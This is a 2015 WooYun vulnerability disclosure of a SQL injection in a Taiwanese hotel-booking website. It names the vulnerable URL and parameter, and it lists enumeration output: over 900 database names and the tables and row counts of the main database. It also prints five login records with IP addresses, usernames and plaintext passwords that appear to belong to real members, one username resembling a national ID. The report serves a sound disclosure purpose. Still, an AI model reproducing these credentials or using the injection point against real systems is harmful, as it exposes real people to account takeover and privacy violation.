
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-099311

Title: A Taiwanese hotel-booking website has a high-risk SQL injection vulnerability (2.3 million plaintext account passwords and database information for 500+ partner hotels)

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 路人甲

Submitted: 2015-03-03 20:55

Fixed: 2015-04-17 20:56

Published: 2015-04-17 20:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-03-03: Details sent to the vendor, awaiting vendor handling
2015-03-08: Vendor confirmed; details visible to the vendor only
2015-03-18: Details disclosed to core white hats and relevant domain experts
2015-03-28: Details disclosed to ordinary white hats
2015-04-07: Details disclosed to intern white hats
2015-04-17: Details disclosed to the public

Brief description:

Plaintext account passwords, national ID numbers, mobile numbers and addresses of 2.3 million+ members
Database information for 500+ partner hotels

Detailed description:

Injection point: http://www.ezhotel.com.tw/hotelwestsites.php?areano=0-33

[image: j.jpg]


Proof of vulnerability:

1. 928 databases in total

available databases [929]:
[*] 1967TRAVEL
[*] 21RESORT
[*] 520TW
[*] 8FANKENG
[*] _LOG_PD_0
[*] A222
[*] ABBA
[*] abc
[*] ACECLUBHOUSE
[*] AGENT_CHANA
[*] AGILITE
[*] AGORAGDN
[*] AIRBUS
[*] AIRLINEINN
[*] ALEEXVILLA
[*] ALISHAN
[*] ALISHANHOUSE
[*] ALIVERESORT
[*] AMAINMOTEL
[*] AMANDA
[*] AMBA
[*] AMBASSADOR
[*] AMBH
[*] AMBIENCE
[*] ANHWA
[*] ANPIN72
[*] ANTONG
[*] APPLEDORE
[*] ARAUCARIA
[*] ARMANI
[*] ARMANI2
[*] ART_MOTEL
[*] ARTSPA
[*] ASPIRERESORT
[*] ASTAR
[*] AT_BOUTIQUE_HOTEL
[*] ATAMI
[*] AYAWAN
[*] AZURE
[*] AZUREHOTEL
[*] BACKPACKERSTW
[*] BACKPACKERSTW2
[*] BAIAN
[*] BALIHOTEL
[*] BALIMOTEL
[*] BAOLAI
[*] BARONHOTEL
[*] BAYFOREST
[*] BB
[*] bb_ch_taichung
[*] bb_chahsi
[*] bb_chashi_cancel
[*] bb_chinatrust
[*] bb_chinatrust_cancel
[*] bb_dao
[*] bb_hoy_cancel
[*] bb_hoya
[*] BB_TEST
[*] bb_westlake
[*] bb_wulin_cancel
[*] BBCHOTEL
[*] BBHOTEL
[*] BEACONHOTEL
[*] BEAUMAX
[*] BEAUTY
[*] BEAUTYHOTEL
[*] BEAUTYSPA
[*] BELLEVISTA
[*] BELLEVUE
[*] BENTLEYPARK
[*] BESTHOTELTW
[*] BICYCLEINN
[*] BIGEYE
[*] bin
[*] BINHAI
[*] BIRDS
[*] BIRDY
[*] BITAN
[*] BLUELAGOON
[*] BOSS
[*] BRHOTEL
[*] BROTHER
[*] BTSC
[*] BUGTWO
[*] BURANO
[*] bus
[*] BUSINESSCENTER
[*] BYEYER
[*] CAESAR
[*] CALLME
[*] CAMBRIDGE
[*] CAPITAL
[*] CAPITALHOTEL
[*] CARLTON
[*] CASAMIA
[*] CATCHPLAY
[*] CDHOTEL
[*] CEDARWOOD
[*] CEOUR
[*] CHAMPS
[*] CHECKINN
[*] CHENGPAO
[*] CHIEFVILLA
[*] CHINATRUST
[*] CHINATRUST_TC
[*] CHINGSHENG
[*] CHINGSHEUI
[*] CHINHUA
[*] CHINSHI
[*] CHKKM
[*] CHUANGTANG
[*] chuangtang
[*] CHUANGTANGHOTEL
[*] CHULU
[*] CHUNAN
[*] CHUNJING
[*] CHUNTENG
[*] CHUTO
[*] CINEMA7
[*] CIRRUSSPA
[*] CITIZEN
[*] CITYHOTEL
[*] CITYLAKE
[*] CITYRESORT
[*] CITYSUITES
[*] CITYSUITES_AIR
[*] CLASSIC
[*] CLOUDHOTEL
[*] CLOUDSPRING
[*] CLOUDVILLA
[*] CLR
[*] CLR2
[*] COSE
[*] COSMOS
[*] CROWN
[*] CROWNHOTEL
[*] CRUNH
[*] CRYSTAL
[*] CRYSTALFARM
[*] CRYSTALHOTEL
[*] CYH
[*] DABANGAN
[*] DAHSING
[*] DAHU
[*] DAILEI
[*] DALUKUANLAND
[*] DAYHOTEL
[*] DEBONAIR
[*] DELIGHT
[*] DELLAGO
[*] DEMO
[*] DEMO_ENG
[*] DEMO_GB
[*] DEMO_SOGOPRO
[*] DEMO_TICKET
[*] demo_utf8
[*] DEMOBANDB
[*] DHMC
[*] DHMC2
[*] DHMC_201305
[*] DHMC_DUMMY
[*] DHMC_NEW
[*] DHMC_OLD
[*] DHMC_SOGOPRO
[*] DI
[*] DISCOVERY
[*] DOLAMANCO
[*] DOLPHIN
[*] done
[*] DONGHWA
[*] DONGHWAHOTEL
[*] DONGTAIRSPA
[*] DOWNHOME
[*] DRAGONINN
[*] DRAGONNANTOU
[*] DRAGONVALLEY
[*] DREAMTOWN
[*] DREAMVILLA
[*] DRYADMOTEL
[*] DUKEHOTEL
[*] DYNASTY
[*] EADOR
[*] EASTERN
[*] EASTERNBEAUTY
[*] EASTHOTEL
[*] EASTSPA
[*] EASTSTARHOTEL
[*] ECOASTSTAR
[*] ECOFARM
[*] EDAROYAL
[*] EDASKYLARK
[*] EDENRESORTS
[*] EHOTEL
[*] EHOUSE
[*] EHRHOTEL
[*] EINHAN
[*] ELAN
[*] ELEGANCE
[*] ELITECONCEPT
[*] ELITESPA
[*] ELOVERSMOTEL
[*] ELPUERTO
[*] EMail
[*] ENGLANDCASTLE
[*] ENHAI
[*] ENSS
[*] ESHUAN
[*] ETAIWAN
[*] ETAIWANWEB
[*] ETICKET
[*] EVAAIR
[*] EVERGREEN_BK
[*] EVERGREEN_JS
[*] EVERGREEN_KL
[*] EVERGREEN_PG
[*] EVERGREEN_PS
[*] EVERGREEN_TC
[*] EVERGREEN_TN
[*] EVERGREEN_TP
[*] EVERLUCK_HOTEL
[*] EVERSPRING
[*] EZBUS
[*] EZHOTEL
[*] EZSALE
[*] EZTICKET
[*] FAMOUS
[*] FAREASTFE
[*] FARM
[*] FASHIONHOTSPRING
[*] FDLHOTEL
[*] FEA_AFA
[*] FENCHIHU
[*] FENGTYAN
[*] FENNEL
[*] FFH
[*] FHOTEL
[*] FHOTELS
[*] FHOTELSW
[*] FINESSE
[*] FIRST
[*] FIRSTHOTELTAIPEI
[*] FISHER
[*] FISHHOTEL
[*] FLEURLIS
[*] FLOWERYOUNG
[*] FORTE
[*] FORTETICKET
[*] FORTUNA
[*] FORTUNE
[*] FOURPOINTS
[*] FREECLOUD
[*] FRESHFIELDS
[*] FUCHIA
[*] FUHOTEL
[*] FUJAI
[*] FUKUOKA
[*] FULIRESORT
[*] FULLERTON
[*] FULLMOONSPA
[*] FUSHIN
[*] FUWAN
[*] FUWARD
[*] FUWARE
[*] FXHOTELS
[*] GALAHOTEL
[*] GANSHANRMA
[*] GARDENHOTEL
[*] GARDENVILLA
[*] GEAR
[*] GINKGO
[*] GLORY
[*] GLVILLA
[*] GOGO
[*] GOLDENAGE
[*] GOLDENHOTEL
[*] GOLDENPALACE
[*] good
[*] GOODGROUND
[*] GOODGROUNDTAINAN
[*] GORAKADAN
[*] GOSHENHOTEL
[*] GOYA
[*] GPH
[*] GRACE
[*] GRACEFUL
[*] GRACEGARDEN
[*] GRAND_NALUWAN
[*] GRANDFORMOSA_TP
[*] GRANDFORWARD
[*] GRANDHILAI
[*] GRANDVIEW
[*] GREEN_HOME
[*] GREENCITY
[*] GREENHOTEL
[*] GVRB
[*] GXTL
[*] H9600123
[*] HALARCINEMA
[*] HALARLIFE
[*] HALLYARD
[*] HANASEI
[*] HANDSOMEHOTEL
[*] HAPPY2006
[*] HAPPYBUSINESS
[*] HAPPYHOTEL
[*] HAPPYIN
[*] HAPPYPANDA
[*] HARAZURU
[*] HARMONYHOTEL
[*] HAUTRHIN
[*] HBJHOTEL
[*] HCHIBISCUS
[*] HCHIBISCUS_TEST
[*] HCSHOTEL
[*] HDPALACE
[*] HEFONG
[*] HEFONG_CHAHSI
[*] HEFONGVILLA
[*] HERATONTAIPEI
[*] HERHUAN
[*] HHOTEL
[*] HIEASTTAIPEI
[*] HIGHNESS
[*] HIHORIZON
[*] HLBNB
[*] HLFAIRYTALE
[*] HLHOTEL
[*] HOFONG
[*] HOGASHU
[*] HOKET
[*] HOLLAND
[*] HOMEHOTEL
[*] HONDOHOTEL
[*] HONDOW
[*] HONEYMOON
[*] HORNGYI
[*] HOSTON
[*] HOT
[*] HOTELBANK
[*] HOTELBANK2
[*] HOTELBANK_BK
[*] HOTELBANK_DEMO
[*] HOTELCHILDHOOD
[*] HOTELCOLOR
[*] HOTELCOZZI
[*] HOTELDAY
[*] HOTELHG
[*] HOTELOCEAN
[*] HOTELPURITY
[*] HOTELRICH
[*] HOTELRIVERVIEW
[*] HOTELSENSE
[*] HOTELSUKIMI
[*] HOTELSUNSHINE
[*] HOTELSUNSHINE2
[*] HOTELWO
[*] HOTHOTEL
[*] HOTSPRING
[*] HOTSPRINGWORLD
[*] HOWARD
[*] HOWARD_old
[*] HOWARDCM
[*] HOWARDKT
[*] HOWARDTPE
[*] HOYA
[*] HRESORT
[*] HSUANTSUNG
[*] HTL
[*] HUAHOU
[*] HUALIEN_NALUWAN
[*] HUALIEN_NARUWAN
[*] HUASHINTAINAN
[*] HUATONG
[*] HUAXIN
[*] HUAYANG
[*] HUSHUIANLAVILLA
[*] HVILLAMOTEL
[*] HWADU
[*] HWAGER
[*] HWATAI
[*] IAN
[*] IDINN
[*] IHOWA
[*] IMAGE
[*] IMAGE_GOLD
[*] IMARSHOTEL
[*] IMPERIAL
[*] information_schema
[*] INHOUSE
[*] INN88
[*] INNCUBE
[*] INNSPRING
[*] INONE
[*] INSKYHOTEL
[*] INYOUNG
[*] IPACKER
[*] IRESORT
[*] JADEHOTEL
[*] JENDOW
[*] JIAHUA
[*] JIHLIH
[*] JIHOTEL
[*] JINDO
[*] JINGAI
[*] JINGAN
[*] JINGLU
[*] JINHUA
[*] JINPINHOTEL
[*] JIUNING
[*] JLHOTEL
[*] JOAN
[*] JOYHOTEL
[*] JRH
[*] JSMOTEL
[*] JUNE
[*] JUNYUE
[*] JUSTAIWAN
[*] JUSTWIN
[*] JYQ
[*] KAGAYA
[*] KANEBO
[*] KANGLEHOTEL
[*] KANGNINGLIFE
[*] KATHERINE
[*] KAVALAN
[*] KDM
[*] KECHIHSUAN
[*] KELLYHOTEL
[*] KENIT
[*] KENTINGTON
[*] KETON
[*] KEVIN66
[*] KGARDENPL
[*] KHHHOTEL
[*] KINGCHENG
[*] KINGDOM
[*] KINGKINGS
[*] KINGMAMMON
[*] KINGNATIONALHOTEL
[*] KINGS
[*] KINGSETHOTEL
[*] KINGSPA
[*] KIREIHOTEL
[*] KIYATT
[*] KLHOTEL
[*] KONG
[*] KTCHATEAU
[*] KTCHATEAU_OLD
[*] KTHOLIDAY
[*] KTHOTEL
[*] KTLIJING
[*] KUKUAN
[*] KUNGKUAN
[*] KUNTAICHUNG
[*] KURHAUS
[*] KUVA
[*] KYOTO
[*] LADYHOTEL
[*] LAILAI
[*] LAKEHOTEL
[*] LAKESHORE
[*] LAKESHORE_HL
[*] LAKESHORE_M1
[*] LALASAN
[*] LANDIS
[*] LANDISLO
[*] LANDISTPE
[*] LANDMARKHOTEL
[*] LANYANG
[*] LAPING
[*] LAPLAZA
[*] LARCHOTEL
[*] LASEARESORT
[*] LAVIEGROUP
[*] LAVILLA
[*] LEADER
[*] LEES
[*] LEMERIDIEN
[*] LEMIDI
[*] LEOFOO
[*] LEOFOOGUANSHI
[*] LEOFOOHOTEL
[*] LEOFOORESIDENCES
[*] LEOFOORESORT
[*] LESCHAMPS
[*] LESHOTEL
[*] LEVILLAS
[*] LI_CHIH
[*] LIDUO
[*] LIDUOBESTHOTEL
[*] LIENFOOK
[*] LINCOLNHOTEL
[*] LINDEN
[*] LINDEN_HP
[*] LINDEN_KH
[*] LINKWORLD
[*] LIONHOTEL
[*] LISHIN
[*] LISHIUAN
[*] LITI
[*] LIUHYANG
[*] LIVINGWATER
[*] LIWU
[*] LIZHOTEL
[*] LMRESORT
[*] LOFTHOTEL
[*] LOHONEKA
[*] LONGSTAYHOTEL
[*] LONGVIEW
[*] LONGVIEWHOTEL
[*] LOTTY
[*] LOTUSHOTEL
[*] LOTUSSPA
[*] LOTUSVILLA
[*] LOVE1028
[*] LOVESPRING
[*] LSHOTEL
[*] LTCITY
[*] MABHOTEL
[*] MADISONTAIPEI
[*] MALDIVES
[*] MANBO
[*] MANGO
[*] MAPLELANDIS
[*] MARLINHOTEL
[*] MARSHAL
[*] MATSUNI
[*] MAYLIN
[*] MAZALU
[*] MEADOWHOTEL
[*] MEIHOTEL
[*] MELODY
[*] MELODYVILLA151
[*] METRO
[*] METROPOLIS
[*] METROPOLITAN
[*] MFWHOTEL
[*] MIFE
[*] MINGAO
[*] MINGGING
[*] MINGLU
[*] MINGSHAN
[*] MINGSHUO
[*] MINMEN
[*] MIT30
[*] MIYIHOTEL
[*] MIZI
[*] MMMVIEW
[*] MONARCH
[*] MONGFUN
[*] MOON_RIVER
[*] MOONGARDEN
[*] MOONVILLA
[*] MOROCCAN
[*] MOUNTAINSTAR
[*] MOVIEMOTEL
[*] MRTHOTEL
[*] MSPA
[*] MSSMOTEL
[*] MSYHOTEL
[*] MUCHA
[*] MUDANWANVILLA
[*] MULANTOP1
[*] MYRESORT
[*] MYSPA
[*] mysql
[*] mysqltest
[*] NANBAO
[*] NANRENHU
[*] NANTOUGARDEN
[*] NARUWAN
[*] NATIONAL
[*] NCZNHOTEL
[*] NEWCALIFORNIA
[*] NEWHUSHUIAN
[*] NEWLIFE
[*] NICEPLAZA
[*] NIKAIDO
[*] NONGANHOTEL
[*] NTPHOTEL
[*] OCEAN
[*] OCEANHOTEL
[*] OCEANVIEW
[*] OHYAMOTEL
[*] OKHILL
[*] OLA
[*] OLLIERE
[*] OLYMPICHOTEL
[*] ONECHUNG
[*] ONERESORTS
[*] ONESTAR
[*] ONESTARSS
[*] ONESTARTP
[*] ooxx
[*] ORIENTALHOTEL
[*] OT
[*] OURHOUSE
[*] PACIFICHOTEL
[*] PACIFICLIFE_SPA
[*] PALMERHOTEL
[*] PALMLAKES
[*] PAPAGO
[*] PAPAGORESORT
[*] PAPAGORESORT_SP
[*] PAPAWAQA
[*] PAPERSUN
[*] PARIS
[*] PARISHOTEL
[*] PARISVILLA
[*] PARKCTHOTEL
[*] PARKTAIPEI
[*] PARKVIEW
[*] PEACH
[*] PEIKUAN
[*] PENNYHOUSE
[*] PESCADORES
[*] PGS_MOTEL
[*] PHAQUARIUM
[*] PHOENIX
[*] PKCV
[*] PLATFORM
[*] PLCRESORT
[*] PLCRESORT_WEB
[*] PLENTIFUL
[*] POLOTRAVEL
[*] POWAHOTEL
[*] PRINCEHOTEL
[*] PUYISY
[*] QUALITYINN
[*] QUEENAROYAL
[*] RAGUESTHOUSE
[*] RAINBOW
[*] RAINBOWHOTEL
[*] RBVILLAS
[*] REDIN
[*] REDLANTERN
[*] REGAL
[*] REGALE
[*] REGALEES
[*] RESORT
[*] RFHOTEL
[*] RFPRETTY
[*] RHOTEL
[*] RICESPA
[*] RICHFREEDOM
[*] RIVER_RESORT
[*] RIVERHOTEL
[*] RIVERSIDE
[*] RIVERSIDEHOTEL
[*] RIVERSIDERESORT
[*] RMATAIWAN
[*] RMFH
[*] RMH
[*] ROSEHOTEL
[*] ROSEMOTEL
[*] ROSERYHOTEL
[*] ROYAL_CHAHSI
[*] ROYAL_CHIHPEN
[*] ROYAL_HC
[*] ROYAL_INN
[*] ROYALBEST
[*] ROYALBIZ
[*] ROYALCASTLE
[*] ROYALCHIAYI
[*] ROYALSEA
[*] ROYALSEASONS
[*] ROYALSPA
[*] ROYALTPE
[*] RRHOTEL
[*] RSINN
[*] RSLHOTEL
[*] RSR
[*] RUISHI_M
[*] RUISHI_N
[*] RUISHI_S
[*] SAAJUST
[*] SAKURA
[*] SANHOCE
[*] SANPO
[*] SANTAI
[*] SANWAN
[*] SANWANT
[*] SANYON
[*] SAUALKEH
[*] SAURA
[*] SDHOTEL
[*] SEAGAIA
[*] SEALIFE
[*] SEASBAY
[*] SEASONS
[*] SEATTE
[*] SECRET_CONFINES
[*] SEES
[*] SEHOTEL
[*] SERVICEAPARTMENT
[*] SFHOTEL
[*] SHANDORI
[*] SHANGHAI
[*] SHANGRI
[*] SHANGRILA
[*] SHANGRILAS
[*] SHANGRIRA
[*] SHANTE
[*] SHBH
[*] SHEIPA
[*] SHERMUH
[*] SHERWOOD
[*] SHHEIGHT
[*] SHINEYOU
[*] SHINKANSEN
[*] SHINSHIN
[*] SHINYUAN
[*] SHIUNG
[*] SHIUNGHOTEL
[*] SILKEN
[*] SILKSPLACEYILAN
[*] SINCERES
[*] SINDA
[*] SINDAHOTEL
[*] SINO
[*] SIRACUSA
[*] SKYLIFE
[*] SKYLIFESPRING
[*] SKYLINEHOTELS
[*] SKYNO1
[*] SLHOTEL
[*] SLSVILLA
[*] SLVHOTEL
[*] SMARTCUE
[*] SMLH
[*] SMOKEYJOES
[*] SOHOMOTEL
[*] SOLASRESORT
[*] SONGBO
[*] SOUTHERN_G
[*] SPA33
[*] SPA_HOTEL
[*] SPARKLE
[*] SPART
[*] SPARTY
[*] SPASPA
[*] SPLENDOR
[*] SPRING
[*] SPRINGBREEZE
[*] SPRINGHILL
[*] SPRINGPARK
[*] SPRINGRESORT
[*] SPRINGSPA
[*] SPRINGVILLA
[*] SSG787
[*] SSS988
[*] STARSHOTEL
[*] STARTRAVEL
[*] STARVILLA
[*] STHOTEL
[*] STORYBNB
[*] STREETCORNER
[*] SUAO
[*] SUITETPE
[*] SUNHOT
[*] SUNLINKSEA
[*] SUNMOONLAKE
[*] SUNMOONLIGHT
[*] SUNNY
[*] SUNPING
[*] SUNRISE
[*] SUNRISE_HUALIEN
[*] SUNSHINE
[*] SUNSHINE_VILLA
[*] SUNSHINEHOTEL
[*] SUNSPRING
[*] SUNSWEET
[*] SVILLA
[*] SVRESORT
[*] SWEETHOME
[*] SWEETME
[*] T_FORESTRAILWAY
[*] TAICHUNGPLAZA
[*] TAIPEICITIZEN
[*] TAIPEIGARDEN
[*] TAIPEIROYAL
[*] TAIPING
[*] TAIPUNGSUITES
[*] TAISHINU
[*] TAITUNG
[*] TAIWAN
[*] TALEE
[*] TANGCHYUAN
[*] TANGNO
[*] TANGYUE
[*] TAOBAO
[*] TAROKO
[*] TAROKO_HOTEL
[*] TAUTAU
[*] TAYIH
[*] TCCH
[*] TCFARM
[*] TCHHOTEL
[*] TCRS
[*] TCSHANGRILA
[*] TEA
[*] TEMPUS
[*] TENLU
[*] TEST
[*] test
[*] TEST_LANDIS
[*] THANGD
[*] THEADAGIO
[*] THECRYSTAL
[*] THEGAIN
[*] THEGALERIEHOTEL
[*] THEMOONHOTEL
[*] THEMUDAN
[*] THESPLENDORKHH
[*] THEWENWAN
[*] TIANLONG
[*] TICKETBANK
[*] TICKETBANK_CHB_SH
[*] TICKETBANK_DEMO
[*] TICKETBANK_HWATAI
[*] TICKETBANK_PANSHIN
[*] TICKETBANK_TAISHIN
[*] TICKETBANK_TC
[*] TICKETBANK_UBOT
[*] TIENLAI
[*] TILUN
[*] TINGLUNG
[*] TLHOLIDAY
[*] TLHOTEL
[*] tmp
[*] TNCHATEAU
[*] TOPPLAZA
[*] TOPROYAL
[*] TPCAESARPARK
[*] TRAINING
[*] TRANS_BELLEVISTA
[*] TRAVEL1111
[*] TRAVEL889
[*] TRAVELER
[*] TRAVELHOME
[*] TRAVELMOTEL
[*] TRAVELOCITY
[*] TRAVELWEB
[*] TREEHOUSE
[*] TSAOLING
[*] TSAOLINGHOTEL
[*] TSAULING
[*] TSUBAKI
[*] TUSCANY
[*] TW616
[*] TWEM
[*] TYGC
[*] TYQ
[*] TYYD
[*] UFDNHOTEL
[*] UHOTEL
[*] UNABABY
[*] UNIQUEHOLIDAY
[*] UNITED
[*] urania
[*] URTRAVELLER
[*] URTRIP
[*] USTAY
[*] VHOTEL
[*] VICTORIA
[*] VILLA393
[*] VILLA_SPA
[*] VIOLETBAY
[*] VIPHOTEL
[*] VIPSPA
[*] W5BESTHOTEL
[*] W9612888
[*] WANGFU
[*] WANLI
[*] WATERMARK
[*] WECAN
[*] WEISENHOUSE
[*] WELCOME
[*] WELFARE
[*] WENPIN
[*] WESTGATE
[*] WESTIN
[*] WESTLAKE
[*] WHRESORT
[*] WINDSORTAIWAN
[*] WOOFU
[*] WTHCLUB
[*] WULAISPRING
[*] WWHOTEL
[*] WWW
[*] WZHOTEL
[*] XIAFEI
[*] XIMEN
[*] YAMAKAWA
[*] YANOLD
[*] YAWAN
[*] YEARS
[*] YEN
[*] YENJIM
[*] YENTAI
[*] YESMOTEL
[*] YESO
[*] YEZE
[*] YEZE_C
[*] YEZE_M
[*] YINSHERB
[*] YIPINYUAN
[*] YIYUAN
[*] YOAI
[*] YOHO
[*] YOOUSHAN
[*] YORKER
[*] YORKTS
[*] YSOARLAN
[*] YSTICKET
[*] YUANTANG
[*] YUCHENO
[*] YUEYA
[*] YUHAO
[*] YUHCHYR
[*] YUHTARNG
[*] YUHTONG
[*] YUNDENG
[*] YUNHSIEN
[*] YUNOYADO
[*] ZENDASUITES
[*] ZENINN
[*] ZKHOTEL
[*] ZUSIN


2. Large amounts of sensitive information are exposed through EZHOTEL

Database: EZHOTEL
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| ClickCountWeb_2008 | 14113477 |
| API_Connect | 13420770 |
| ClickCountWeb | 10409961 |
| ClickCountWeb_2009 | 7390402 |
| Login | 6935573 |
| TIP_EXEC | 2338585 |
| MemberLoginLog | 2330533 |
| Ticket_API_Log | 2200926 |
| TBL_Log | 1206330 |
| SEOInfo | 814398 |
| B2B2C_ClickCount | 646574 |
| weather | 409148 |
| FN_OrderInfo | 304788 |
| MultiPromotionPrice | 173571 |
| Access_Session | 158162 |
| PlatForm_AD_TimesReport | 129699 |
| EAN_Region | 124125 |
| PlatForm_AD_TimesReport_2010_03 | 116936 |
| MultiPromotionRoomQty | 107043 |
| IPDatabase | 78921 |
| PKI_Use_Info | 72545 |
| b2b2c_orderinfo | 69746 |
| E_InvoiceData | 52620 |
| Sure_News_SendMailLog | 52390 |
| FN_OrderInfo_Cancel | 34134 |
| PlatForm_Count | 32669 |
| b2p_user_log | 31322 |
| EZHotelInfo1_bk | 29890 |
| AcerSN1 | 28002 |
| Journal | 23063 |
| IbonGetTicket | 21872 |
| ezHotel | 20944 |
| WorkSheet | 19712 |
| b2p_orderinfo | 18687 |
| HotelOrderListSSL | 16041 |
| BulletinMail | 16028 |
| TIP_Product | 13486 |
| b2p_user_access_session | 13383 |
| TRAVEL_TK_OrderInfoDetail | 11853 |
| EAN_HotelInfo | 11612 |
| AcerSN2 | 10208 |
| WEB_RANK | 7481 |
| b2b2c_orderinfo_waiting | 6010 |
| TrustMall_Coupon | 5956 |
| test_duncan | 5753 |
| TRAVEL_TK_OrderInfo | 5699 |
| AccessInfo | 5384 |
| DiscountCount | 4797 |
| MultiOrderInfoC | 4661 |
| MIS_Contact | 4622 |
| MultiOrderInfoB | 4588 |
| CustInfo | 4551 |
| ExchangeInfo | 3439 |
| B2A_Agent_Session | 3215 |
| FN_OrderInfo_TicketGo | 3011 |
| HotelContract_Detail | 2841 |
| Mail_Question_SendLog | 2622 |
| FN_OrderInfo_B2B2C | 2601 |
| MIS_Contract | 2457 |
| MultiCancelSet | 2358 |
| TaiwanPass | 2335 |
| MultiOrderInfo | 2332 |
| MultiCardInfo | 2328 |
| MultiINVInfo | 2328 |
| FN_OrderInfo_Shopping | 2151 |
| ClickCountIP_black | 2125 |
| EZHotelInfo | 2100 |
| EZHotelInfo1 | 1954 |
| ADInfo | 1910 |
| FN_OrderInfo_Other | 1900 |
| TrustMall_LabarPlayInfo | 1888 |
| Address | 1831 |
| B2A_CompanyInfo | 1788 |
| Address_Detail | 1768 |
| B2A_SendMailLog | 1570 |
| EZHotelInfo3 | 1531 |
| GrouponCode | 1500 |
| MIS_Company | 1428 |
| Msg_CustSysResponse | 1414 |
| Channel_Relation_RoomType | 1369 |
| Surehigh_Message | 1297 |
| MultiPromotionB | 1223 |
| HotelContract | 1117 |
| PlatForm_AD_Info | 1113 |
| HotelIntro | 1064 |
| b2p_layout_data | 998 |
| CountryCode | 919 |
| Msg_SystemNoticeToHotel | 909 |
| HotelStatus | 854 |
| MRTNearHotel | 854 |
| HotelKeyLoc | 826 |
| ThemePromotionDetail | 767 |
| b2p_user_access | 718 |
| HotelKeyInfo | 694 |
| b2p_hotel_contact | 673 |
| B2B2C_AgentInfo | 665 |
| Address_Street | 650 |
| MultiHotelOrderListSSL | 642 |
| MultiPromotion | 629 |
| DHMC_Amount_Adjust | 582 |
| B2A_AgentInfo | 556 |
| FN_OrderInfo_BBCTK | 547 |
| bd_order_detail | 543 |
| FN_OrderInfo_TC | 496 |
| CustServContent | 462 |
| HotelFactory | 434 |
| TWHotel_Relation_RoomType | 433 |
| Paymenttype_Response | 385 |
| EpaperSubLog | 383 |
| Address_City | 376 |
| PKI_Info | 374 |
| AdminInfo | 339 |
| Channel_Relation_Hotel | 331 |
| Channel_Relation_On | 326 |
| bd_menu | 319 |
| AdminInfo_Detail | 317 |
| FN_OrderInfo_B2B2CTC | 314 |
| Web_UserCount | 302 |
| WorkSheetInfo | 289 |
| Access_Sub | 276 |
| BulletinInfo | 255 |
| HotelLocLang | 252 |
| Country_Code | 248 |
| EZCustInfo | 245 |
| CustServMsg | 233 |
| EZHotel_Question | 229 |
| FN_OrderInfo_TicketGo_Cancel | 229 |
| b2p_layout_sub | 226 |
| CountryInfo | 218 |
| bd_order | 192 |
| Mail_Question_Waiting_SendLog | 192 |
| AgodaPrice | 185 |
| AccessSub | 184 |
| weather_desc | 181 |
| WorkSheet_PMS | 180 |
| BBC_Hotel_On | 168 |
| MIS_Type | 163 |
| BirthGreeting | 158 |
| Access_Main | 154 |
| weather_detail | 147 |
| TWHotel_Relation_OrderInfo | 145 |
| Address_Area | 135 |
| Msg_SystemNotice | 135 |
| Promotion_To_Coupon | 122 |
| TWHotel_Relation | 118 |
| HotelLoc1 | 116 |
| HotelLoc | 115 |
| HotelLoc3 | 115 |
| B2A_AgentInfoB | 106 |
| GDS_RoomInfo | 103 |
| UpdateOrderInfoLog | 103 |
| FB_PageInfo | 101 |
| MultiOrderInfoMapping | 99 |
| TaiwanGo_Collections | 88 |
| taipeifood | 83 |
| AIR_Route | 82 |
| b2p_user | 79 |
| AIR_Batch | 77 |
| HotelFacilities | 66 |
| MultiPromotionGroup | 63 |
| bd_type | 59 |
| THSR_TicketPrice | 56 |
| EventAttendEmail | 55 |
| FB_UserInfo | 55 |
| RoomFacilities | 54 |
| rate_currinfo | 53 |
| Schedule | 53 |
| b2p_layout_main | 52 |
| GDS_HotelInfo | 51 |
| simple_email | 51 |
| ThemeProductDetail | 51 |
| ClickCountIP | 50 |
| FN_OrderInfo_Shopping_Cancel | 50 |
| DeleteFNOrderInfoLog | 48 |
| Access_Title2 | 44 |
| Department | 42 |
| Sure_News | 42 |
| Surehigh_News | 42 |
| HotelIntroIndex | 39 |
| Sure_News_Detail | 37 |
| Paymenttype_Detail | 36 |
| FN_OrderInfo_BBCTK_Cancel | 35 |
| Multi_DB_Relation | 35 |
| ThemePromotion | 35 |
| bd_shop | 33 |
| weather_loc | 28 |
| Address_State | 26 |
| E_InvoiceNumber | 26 |
| TrustMall_LabarGiftLog | 25 |
| AccessMain | 24 |
| bd_action | 24 |
| FB_PublishInfo | 24 |
| HotelHot | 23 |
| b2p_user_group | 19 |
| Surehigh_Files | 19 |
| WorkSheet_Request_Type | 19 |
| AccessSub_Extra_Set | 16 |
| E_InvoicePrize | 16 |
| b2p_menu_sub | 15 |
| HotelType | 15 |
| HotelTypeLang | 15 |
| FB_PageNews | 13 |
| rate_exchange | 13 |
| Surehigh_Education | 12 |
| Access_Title1 | 11 |
| DataBaseRelationShip | 10 |
| b2p_menu_main | 8 |
| B2A_MsgPost | 7 |
| HotLink | 7 |
| MultiPromotionAddon | 7 |
| HotelType1 | 6 |
| TrustMall_LabarGiftInfo | 6 |
| Address_State_Class | 5 |
| B2B2C_ADInfo_Detail | 5 |
| b2p_company | 5 |
| Address_City_Class | 4 |
| AIR_Airline | 4 |
| CharSet | 4 |
| CheckTotalPrice | 4 |
| Address_Area_Class | 3 |
| Address_Street_Class | 3 |
| B2B2C_ADInfo | 3 |
| Msg_SystemNoticeType | 3 |
| MailingList_Confirmation | 2 |
| MemBonusInfo | 2 |
| NET_Price | 1 |
| PromotionEvent | 1 |
| Report_Relation | 1 |
| RoomNotification | 1 |
| TaiwanGo_Cases | 1 |
+---------------------------------+---------+


Looking at MemberLoginLog, the 2.33 million account records all carry plaintext passwords:

Table: MemberLoginLog
[5 entries]
+-----------------+-------+------------+------------+---------------------+
| IP | VarNo | LoginName | LoginPass | LoginTime |
+-----------------+-------+------------+------------+---------------------+
| 210.202.81.67 | 3 | mife | mifelalala | 2011-10-28 15:28:03 |
| 220.130.183.74 | 231 | yauco6 | yy560225 | 2011-10-28 15:28:33 |
| 1.200.155.129 | 420 | leonho | leon1125 | 2011-10-28 15:28:44 |
| 220.138.129.224 | 226 | J221685791 | woxn77 | 2011-10-28 15:30:00 |
| 118.233.233.128 | 546 | 521410 | f8802439 | 2011-10-28 15:40:40 |
+-----------------+-------+------------+------------+---------------------+


Logging in to the mife account shows that the national ID number, mobile number, landline number and home address are exposed.

[image: s2.jpg]
